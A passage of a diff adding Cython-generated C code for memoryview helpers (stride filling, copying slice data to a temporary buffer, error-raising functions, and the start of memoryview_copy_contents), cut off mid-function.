"View.MemoryView":1181 + * size *= shape + * + * return size # <<<<<<<<<<<<<< + * + * @cname('__pyx_fill_contig_strides_array') + */ + __pyx_r = __pyx_v_size; + goto __pyx_L0; + + /* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, Py_ssize_t __pyx_v_stride, int __pyx_v_ndim, char __pyx_v_order) { + int __pyx_v_idx; + Py_ssize_t __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + __pyx_t_1 = (__pyx_v_order == 'F'); + if (__pyx_t_1) { + + /* "View.MemoryView":1194 + * + * if order == 'F': + * for idx in range(ndim): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + __pyx_t_2 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_idx = __pyx_t_4; + + /* "View.MemoryView":1195 + * if order == 'F': + * for idx in range(ndim): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * else: + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1196 + * for idx in range(ndim): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * else: + * for idx in range(ndim - 1, -1, -1): + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1198 + * stride *= shape[idx] + * else: + * for idx in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + /*else*/ { + for (__pyx_t_2 = (__pyx_v_ndim - 1); __pyx_t_2 > -1; __pyx_t_2-=1) { + __pyx_v_idx = __pyx_t_2; + + /* "View.MemoryView":1199 + * else: + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1200 + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * + * return stride + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + } + __pyx_L3:; + + /* "View.MemoryView":1202 + * stride *= shape[idx] + * + * return stride # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_data_to_temp') + */ + __pyx_r = __pyx_v_stride; + goto __pyx_L0; + + /* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_tmpslice, char __pyx_v_order, int __pyx_v_ndim) { + int __pyx_v_i; + void *__pyx_v_result; + size_t __pyx_v_itemsize; + size_t __pyx_v_size; + void *__pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + struct __pyx_memoryview_obj *__pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1216 + * cdef void *result + * + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef size_t size = slice_get_size(src, ndim) + * + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1217 + * + * cdef size_t itemsize = src.memview.view.itemsize + * cdef size_t size = slice_get_size(src, ndim) # <<<<<<<<<<<<<< + * + * result = malloc(size) + */ + __pyx_v_size = __pyx_memoryview_slice_get_size(__pyx_v_src, __pyx_v_ndim); + + /* "View.MemoryView":1219 + * cdef size_t size = slice_get_size(src, ndim) + * + * result = malloc(size) # <<<<<<<<<<<<<< + * if not result: + * _err_no_memory() + */ + __pyx_v_result = malloc(__pyx_v_size); + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + __pyx_t_2 = (!(__pyx_v_result != 0)); + if (__pyx_t_2) { + + /* "View.MemoryView":1221 + * result = malloc(size) + * if not result: + * _err_no_memory() # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_3 = __pyx_memoryview_err_no_memory(); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 1221, __pyx_L1_error) + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + } + + /* "View.MemoryView":1224 + * + * + * tmpslice.data = result # <<<<<<<<<<<<<< + * tmpslice.memview = src.memview + * for i in range(ndim): + */ + __pyx_v_tmpslice->data = ((char *)__pyx_v_result); + + /* "View.MemoryView":1225 + * + * tmpslice.data = result + * tmpslice.memview = src.memview # <<<<<<<<<<<<<< + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + */ + __pyx_t_4 = __pyx_v_src->memview; + __pyx_v_tmpslice->memview = __pyx_t_4; + + /* "View.MemoryView":1226 + * tmpslice.data = result + * tmpslice.memview = src.memview + * for i in range(ndim): # <<<<<<<<<<<<<< + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1227 + * tmpslice.memview = src.memview + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] # <<<<<<<<<<<<<< + * tmpslice.suboffsets[i] = -1 + * + */ + (__pyx_v_tmpslice->shape[__pyx_v_i]) = (__pyx_v_src->shape[__pyx_v_i]); + + /* "View.MemoryView":1228 + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) + */ + (__pyx_v_tmpslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1230 + * tmpslice.suboffsets[i] = -1 + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) # <<<<<<<<<<<<<< + * + * + */ + (void)(__pyx_fill_contig_strides_array((&(__pyx_v_tmpslice->shape[0])), (&(__pyx_v_tmpslice->strides[0])), __pyx_v_itemsize, __pyx_v_ndim, __pyx_v_order)); + + /* "View.MemoryView":1233 + * + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + __pyx_t_2 = ((__pyx_v_tmpslice->shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1235 + * for i in range(ndim): + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 # <<<<<<<<<<<<<< + * + * if slice_is_contig(src[0], order, ndim): + */ + (__pyx_v_tmpslice->strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + } + } + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + __pyx_t_2 = __pyx_memviewslice_is_contig((__pyx_v_src[0]), __pyx_v_order, __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1238 + * + * if slice_is_contig(src[0], order, ndim): + * memcpy(result, src.data, size) # <<<<<<<<<<<<<< + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + */ + (void)(memcpy(__pyx_v_result, __pyx_v_src->data, __pyx_v_size)); + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":1240 + * memcpy(result, src.data, size) + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) # <<<<<<<<<<<<<< + * + * return result + */ + /*else*/ { + copy_strided_to_strided(__pyx_v_src, __pyx_v_tmpslice, __pyx_v_ndim, __pyx_v_itemsize); + } + __pyx_L9:; + + /* "View.MemoryView":1242 + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.copy_data_to_temp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + +static int __pyx_memoryview_err_extents(int __pyx_v_i, Py_ssize_t __pyx_v_extent1, Py_ssize_t __pyx_v_extent2) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + Py_UCS4 __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_extents", 0); + + /* "View.MemoryView":1249 + * cdef int _err_extents(int i, Py_ssize_t extent1, + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_dim') + */ + __pyx_t_1 = PyTuple_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_3 = 127; + __Pyx_INCREF(__pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_2 += 35; + __Pyx_GIVEREF(__pyx_kp_u_got_differing_extents_in_dimensi); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_4 = __Pyx_PyUnicode_From_int(__pyx_v_i, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_got); + __pyx_t_2 += 6; + __Pyx_GIVEREF(__pyx_kp_u_got); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_kp_u_got); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent1, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_and); + __pyx_t_2 += 5; + __Pyx_GIVEREF(__pyx_kp_u_and); + PyTuple_SET_ITEM(__pyx_t_1, 4, __pyx_kp_u_and); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent2, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 5, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_2 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_1, 6, __pyx_kp_u__7); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_1, 7, __pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_4, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 1249, __pyx_L1_error) + + /* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView._err_extents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + +static int __pyx_memoryview_err_dim(PyObject *__pyx_v_error, PyObject *__pyx_v_msg, int __pyx_v_dim) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_dim", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1253 + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: + * raise error, msg % dim # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err') + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyString_FormatSafe(__pyx_v_msg, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_t_2, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(1, 1253, __pyx_L1_error) + + /* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._err_dim", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + +static int __pyx_memoryview_err(PyObject *__pyx_v_error, PyObject *__pyx_v_msg) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1257 + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: + * raise error, msg # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_no_memory') + */ + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_v_msg, 0, 0); + __PYX_ERR(1, 1257, __pyx_L1_error) + + /* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + +static int __pyx_memoryview_err_no_memory(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_no_memory", 0); + + /* "View.MemoryView":1261 + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: + * raise MemoryError # <<<<<<<<<<<<<< + * + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 1261, __pyx_L1_error) + + /* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err_no_memory", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice __pyx_v_src, __Pyx_memviewslice __pyx_v_dst, int __pyx_v_src_ndim, int __pyx_v_dst_ndim, int __pyx_v_dtype_is_object) { + void *__pyx_v_tmpdata; + size_t __pyx_v_itemsize; + int __pyx_v_i; + char __pyx_v_order; + int __pyx_v_broadcasting; + int __pyx_v_direct_copy; + __Pyx_memviewslice __pyx_v_tmp; + int __pyx_v_ndim; + int __pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + void *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1273 + * Check for overlapping memory and verify the shapes. + * """ + * cdef void *tmpdata = NULL # <<<<<<<<<<<<<< + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + */ + __pyx_v_tmpdata = NULL; + + /* "View.MemoryView":1274 + * """ + * cdef void *tmpdata = NULL + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + */ + __pyx_t_1 = __pyx_v_src.memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1276 + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) # <<<<<<<<<<<<<< + * cdef bint broadcasting = False + * cdef bint direct_copy = False + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_src), __pyx_v_src_ndim); + + /* "View.MemoryView":1277 + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False # <<<<<<<<<<<<<< + * cdef bint direct_copy = False + * cdef __Pyx_memviewslice tmp + */ + __pyx_v_broadcasting = 0; + + /* "View.MemoryView":1278 + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False + * cdef bint direct_copy = False # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice tmp + * + */ + __pyx_v_direct_copy = 0; + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + __pyx_t_2 = (__pyx_v_src_ndim < __pyx_v_dst_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1282 + * + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_src), __pyx_v_src_ndim, __pyx_v_dst_ndim); + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + __pyx_t_2 = (__pyx_v_dst_ndim < __pyx_v_src_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1284 + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) # <<<<<<<<<<<<<< + * + * cdef int ndim = max(src_ndim, dst_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_dst), __pyx_v_dst_ndim, __pyx_v_src_ndim); + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + } + __pyx_L3:; + + /* "View.MemoryView":1286 + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + * cdef int ndim = max(src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + __pyx_t_3 = __pyx_v_dst_ndim; + __pyx_t_4 = __pyx_v_src_ndim; + if ((__pyx_t_3 > __pyx_t_4)) { + __pyx_t_5 = __pyx_t_3; + } else { + __pyx_t_5 = __pyx_t_4; + } + __pyx_v_ndim = __pyx_t_5; + + /* "View.MemoryView":1288 + * cdef int ndim = max(src_ndim, dst_ndim) + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + */ + __pyx_t_5 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_5; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) != (__pyx_v_dst.shape[__pyx_v_i])); + if (__pyx_t_2) { + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1291 + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + * broadcasting = True # <<<<<<<<<<<<<< + * src.strides[i] = 0 + * else: + */ + __pyx_v_broadcasting = 1; + + /* "View.MemoryView":1292 + * if src.shape[i] == 1: + * broadcasting = True + * src.strides[i] = 0 # <<<<<<<<<<<<<< + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) + */ + (__pyx_v_src.strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + goto __pyx_L7; + } + + /* "View.MemoryView":1294 + * src.strides[i] = 0 + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) # <<<<<<<<<<<<<< + * + * if src.suboffsets[i] >= 0: + */ + /*else*/ { + __pyx_t_6 = __pyx_memoryview_err_extents(__pyx_v_i, (__pyx_v_dst.shape[__pyx_v_i]), (__pyx_v_src.shape[__pyx_v_i])); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1294, __pyx_L1_error) + } + __pyx_L7:; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + } + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + __pyx_t_2 = ((__pyx_v_src.suboffsets[__pyx_v_i]) >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":1297 + * + * if src.suboffsets[i] >= 0: + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) # <<<<<<<<<<<<<< + * + * if slices_overlap(&src, &dst, ndim, itemsize): + */ + __pyx_t_6 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Dimension_d_is_not_direct, __pyx_v_i); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1297, __pyx_L1_error) + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + } + } + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, 